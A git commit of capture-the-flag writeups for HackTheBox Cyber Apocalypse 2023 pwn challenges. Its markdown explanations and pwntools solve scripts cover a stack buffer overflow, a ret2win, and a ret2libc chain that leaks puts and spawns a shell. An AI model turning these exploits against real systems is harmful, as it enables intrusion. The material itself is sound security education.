docs: Add warmup and pwn

sbencoding · sbencoding · commit 34a581dc57da · 2023-03-23T21:43:56.000+01:00
diff --git a/README.md b/README.md
@@ -0,0 +1,13 @@
+# HTB Cyber Apocalypse 2023 writeups
+This repo includes my solutions to the challenges I have solved during the [contest](https://ctf.hackthebox.com/event/details/cyber-apocalypse-2023-the-cursed-mission-821).
+
+In the end I have managed to solve a total of 49/74 challenges, as an [individual contestant](https://ctf.hackthebox.com/team/overview/62988).
+
+* [Warmup](warmup.md)
+* Pwn
+    - [Initialise connection](pwn/initialize_connection.md)
+    - [Questionaire](pwn/questionnaire.md)
+    - [Getting started](pwn/getting_started)
+    - [Labyrinth](pwn/labyrinth)
+    - [Pandora's box](pwn/pandoras_box)
+    - [Void](pwn/void)
diff --git a/pwn/getting_started/README.md b/pwn/getting_started/README.md
@@ -0,0 +1,25 @@
+# Getting started (very easy)
+This challenge focuses on making sure we know how to interact through `pwntools` with binaries and remotes.
+
+`gs` contains a buffer overflow vulnerability and prompts us to overflow the buffer.
+
+As can be seen from the nice output, we need 40 bytes to reach the target and then 8 more byte to overwrite it
+```
+After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:
+
+
+      [Addr]       |      [Value]
+-------------------+-------------------
+0x00007fffdaf5a1b0 | 0x4242424241414141 <- Start of buffer
+0x00007fffdaf5a1b8 | 0x0000000000000000
+0x00007fffdaf5a1c0 | 0x0000000000000000
+0x00007fffdaf5a1c8 | 0x0000000000000000
+0x00007fffdaf5a1d0 | 0x6969696969696969 <- Dummy value for alignment
+0x00007fffdaf5a1d8 | 0x00000000deadbeef <- Target to change
+0x00007fffdaf5a1e0 | 0x000055b091327800 <- Saved rbp
+0x00007fffdaf5a1e8 | 0x00007f7f17c21c87 <- Saved return address
+0x00007fffdaf5a1f0 | 0x0000002000000000
+0x00007fffdaf5a1f8 | 0x00007fffdaf5a2c8
+```
+
+After constructing this payload in the provided wrapper script, we can point it at the remote and get the flag
diff --git a/pwn/getting_started/wrapper.py b/pwn/getting_started/wrapper.py
@@ -0,0 +1,28 @@
+#!/usr/bin/python3.8
+
+'''
+You need to install pwntools to run the script.
+To run the script: python3 ./wrapper.py
+'''
+
+# Library
+from pwn import *
+
+# Open connection
+IP   = '165.232.98.59' # Change this
+PORT = 30638 # Change this
+
+r    = remote(IP, PORT)
+# r = process('./gs')
+
+# Craft payload
+payload = b'A' * 40 # Change the number of "A"s
+payload += b'B' * 8
+
+# Send payload
+r.sendline(payload)
+
+r.interactive()
+
+# Read flag
+success(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}')
diff --git a/pwn/initialize_connection.md b/pwn/initialize_connection.md
@@ -0,0 +1,7 @@
+# Initialise connection (very easy)
+This challegne wasn't hard either a simple command can be used in order to solve the challenge:
+```shell
+nc <ip> <port>
+```
+
+Once connected, sending the number "1" yields the flag
diff --git a/pwn/labyrinth/README.md b/pwn/labyrinth/README.md
@@ -0,0 +1,86 @@
+# Labyrinth (easy)
+This challenge involves exploiting a simple buffer overflow and then redirecting execution to a different function.
+
+First we check the protections the binary has, using `checksec`
+```
+    Arch:     amd64-64-little
+    RELRO:    Full RELRO
+    Stack:    No canary found
+    NX:       NX enabled
+    PIE:      No PIE (0x400000)
+    RUNPATH:  b'./glibc/'
+```
+
+Pretty much nothing, there's no canary and no ASLR.
+
+Loading the binary into Ghidra, I analyzed the `main` function.
+
+```c
+undefined8 main(void)
+
+{
+  int iVar1;
+  undefined8 local_38;
+  undefined8 local_30;
+  undefined8 local_28;
+  undefined8 local_20;
+  char *local_18;
+  ulong local_10;
+  
+  setup();
+  banner();
+  local_38 = 0;
+  local_30 = 0;
+  local_28 = 0;
+  local_20 = 0;
+  fwrite("\nSelect door: \n\n",1,0x10,stdout);
+  for (local_10 = 1; local_10 < 0x65; local_10 = local_10 + 1) {
+    if (local_10 < 10) {
+      fprintf(stdout,"Door: 00%d ",local_10);
+    }
+    else if (local_10 < 100) {
+      fprintf(stdout,"Door: 0%d ",local_10);
+    }
+    else {
+      fprintf(stdout,"Door: %d ",local_10);
+    }
+    if ((local_10 % 10 == 0) && (local_10 != 0)) {
+      putchar(10);
+    }
+  }
+  fwrite(&DAT_0040248f,1,4,stdout);
+  local_18 = (char *)malloc(0x10);
+  fgets(local_18,5,stdin);
+  iVar1 = strncmp(local_18,"69",2);
+  if (iVar1 != 0) {
+    iVar1 = strncmp(local_18,"069",3);
+    if (iVar1 != 0) goto LAB_004015da;
+  }
+  fwrite("\nYou are heading to open the door but you suddenly see something on the wall:\n\n\"Fly li ke a bird and be free!\"\n\nWould you like to change the door you chose?\n\n>> "
+         ,1,0xa0,stdout);
+  fgets((char *)&local_38,0x44,stdin);
+LAB_004015da:
+  fprintf(stdout,"\n%s[-] YOU FAILED TO ESCAPE!\n\n",&DAT_00402541);
+  return 0;
+}
+```
+
+First, 69 should be provided as a door number, in order to get into the vulnerable path of execution.
+
+Then `fgets` will read 0x44 bytes into `local_38`. We see at the top of the function that is has 6 variables on the stack starting from `local_38`, each is 8 bytes large.
+
+Then we can overwrite the RBP of the calling function and then the **return address**.
+
+Browsing the list of functions in Ghidra, I found the `escape_strategy` function, which gives us the flag.
+
+As a final trick, stack alignment was an issue, therefore a ROP gadgets needed to be added to the payload, in order to align the stack pointer to 16 bytes again.
+To fix alignment a simple `ret` ROP gadget can be placed. This will just pop the element from the stack and set the program counter to it.
+
+To find the ROP gadget I will use the `pwntools` functions.
+
+So our payload that gets put on the stack will be:
+```
+[48 - padding] + [8 - RBP overwrite] + [8 - ret gadget] + [8 - win function address]
+```
+
+Running `solve.py` will give us the flag.
diff --git a/pwn/labyrinth/solve.py b/pwn/labyrinth/solve.py
@@ -0,0 +1,19 @@
+import sys
+from pwn import *
+
+rem = True
+p = None
+elf = ELF('./labyrinth')
+rop = ROP(elf)
+res = rop.find_gadget(['ret'])
+g_ret = res.address
+
+if not rem:
+    p = process('./labyrinth')
+else:
+    p = remote('144.126.196.198', 31530)
+
+p.sendline(b'69')
+input()
+p.sendline(b'A' * 48 + b'B' * 8 + p64(g_ret) + p64(0x00401255))
+p.interactive()
diff --git a/pwn/pandoras_box/README.md b/pwn/pandoras_box/README.md
@@ -0,0 +1,83 @@
+# Pandora's box (easy)
+For this challenge a simple buffer overflow vulnerability needs to be exploited.
+
+Running the usual `checksec` analysis to see what protections the binary has:
+```
+    Arch:     amd64-64-little
+    RELRO:    Full RELRO
+    Stack:    No canary found
+    NX:       NX enabled
+    PIE:      No PIE (0x400000)
+    RUNPATH:  b'./glibc/
+```
+
+Good! No ASLR for the binary and also no stack canary.
+
+Next I loaded the binary in to Ghidra to see what was happening under the hood.
+The interesting function here will be `box()` which is called from `main()` after some setup and the banner.
+
+```c
+void box(void)
+
+{
+  undefined8 local_38;
+  undefined8 local_30;
+  undefined8 local_28;
+  undefined8 local_20;
+  long local_10;
+  
+  local_38 = 0;
+  local_30 = 0;
+  local_28 = 0;
+  local_20 = 0;
+  fwrite("This is one of Pandora\'s mythical boxes!\n\nWill you open it or Return it to the Library  for analysis?\n\n1. Open.\n2. Return.\n\n>> "
+         ,1,0x7e,stdout);
+  local_10 = read_num();
+  if (local_10 != 2) {
+    fprintf(stdout,"%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n",&DAT_004021c7);
+                    /* WARNING: Subroutine does not return */
+    exit(0x520);
+  }
+  fwrite("\nInsert location of the library: ",1,0x21,stdout);
+  fgets((char *)&local_38,0x100,stdin);
+  fwrite("\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n",1,0x4b,
+         stdout);
+  return;
+}
+```
+
+If we input anything other than 2, then we fail the challenge, so let's input 2.
+
+Next up `fgets` is called, and the buffer overflow happens here.
+As we see from the variables on the top, the current stack frame is only 40 bytes, however 0x100 (256) bytes are being read.
+
+Unlike the previous challenge here we don't have a *win function* therefore we will aim for arbitrary code execution, i.e get a shell.
+
+I chose to solve this challenge using the `ret2libc` technique, so in order to find out where the libc functions are loaded I needed to leak the libc address.
+
+Thankfully remember that the binary itself doesn't have ASLR therefore we know where the PLT and the GOT are.
+Using this information we can construct our first exploit that will leak the libc address of the puts function.
+
+```
+[40 - padding] + [8 - old RBP] + [8 - ret gadget] + [8 - pop rdi; ret gadget] + [8 - puts@got] + [8 - puts@plt] + [8 - box function address]
+```
+
+The first gadget will just pop the next location to execute from the stack and jump to it. We need this to fix stack pointer alignment to 16 bytes, which some functions are sensitive to.
+
+The next gadget will pop from the stack into RDI and then return. Essentially this allows us to call single argument functions. The address in the GOT where puts is will be the argument and the `puts` function will be the function we call.
+
+This will essentially call `puts(puts)`, resulting in the address of the puts function being leaked.
+
+We finish up with the address of `box` since after the leak we want to continue our exploit to get the shell.
+
+Now that we know the address of puts, we can figure out where libc is being loaded.
+Then we can look for the `system` function in libc and the `/bin/sh` string.
+
+Once we have these a second stage payload is constructed
+```
+[40 - padding] + [8 - old RBP] + [8 - ret gadget] + [8 - pop rdi; ret gadget] + [8 - /bin/sh string address] + [8 - system]
+```
+
+Here again we first align the stack, and then call `system("/bin/sh")` to get our shell.
+
+Once the exploit goes through we can just print the flag from our shell.
diff --git a/pwn/pandoras_box/solve.py b/pwn/pandoras_box/solve.py
@@ -0,0 +1,41 @@
+from pwn import *
+
+rem = True
+
+libc = ELF('./glibc/libc.so.6')
+elf = ELF('./pb')
+rop = ROP(elf)
+g_rdi_ret = rop.find_gadget(['pop rdi', 'ret']).address
+g_ret = rop.find_gadget(['ret']).address 
+
+plt_puts = elf.plt['puts']
+got_puts = elf.got['puts']
+box = elf.symbols['box']
+
+if not rem:
+    p = process('./pb')
+else:
+    p = remote('144.126.196.198', 32494)
+
+p.sendline(b'2')
+
+padding = b'A' * 40 + b'B' * 8 
+exploit = p64(g_ret) + p64(g_rdi_ret) + p64(got_puts) + p64(plt_puts) + p64(box)
+payload = padding + exploit
+p.sendline(payload)
+p.recvuntil(b'thank you!')
+puts_leak = u64(p.recvuntil(b'This').replace(b'This', b'').strip().ljust(8, b'\x00'))
+libc_base = puts_leak - libc.symbols['puts']
+log.info(f'libc base {hex(libc_base)}')
+
+libc_system = libc_base + libc.symbols['system']
+bin_sh = libc_base + next(libc.search(b'/bin/sh'))
+
+log.info(f'system @ {hex(libc_system)}')
+log.info(f'binsh @ {hex(bin_sh)}')
+chain = p64(g_ret) + p64(g_rdi_ret) + p64(bin_sh) + p64(libc_system)
+p.sendline(b'2')
+# Extra padding required, analysis of gdb shows this
+p.sendline(padding + b'C' * 8 + chain)
+
+p.interactive()
diff --git a/pwn/questionnaire.md b/pwn/questionnaire.md
diff --git a/pwn/void/README.md b/pwn/void/README.md
diff --git a/pwn/void/solve.py b/pwn/void/solve.py
diff --git a/warmup.md b/warmup.md
